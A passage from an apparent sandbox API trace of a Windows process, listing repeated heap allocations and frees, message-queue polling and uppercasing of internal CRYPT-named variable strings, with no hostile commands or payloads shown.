returned 1 [0234.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0234.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0234.771] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0234.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0234.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.771] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0234.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0234.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0234.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0234.771] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0234.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0234.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.771] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0234.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0234.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0234.772] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0234.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0234.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0234.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0234.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0234.773] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0234.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0234.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0234.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0234.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0234.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0234.773] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0234.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0234.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0234.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0234.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0234.774] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0234.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0234.774] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0234.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0234.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0234.774] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0234.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0234.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0234.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0234.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0234.774] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0234.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0234.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0234.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0234.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0234.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0234.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0234.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0234.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0234.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0234.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0234.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0234.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.825] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0234.825] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0234.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0234.825] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0234.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0234.826] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.826] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0234.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0234.827] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0234.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0234.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0234.827] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0234.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0234.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0234.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0234.827] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.827] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0234.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0234.827] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.828] HeapFree (in: hHeap=0x970000, 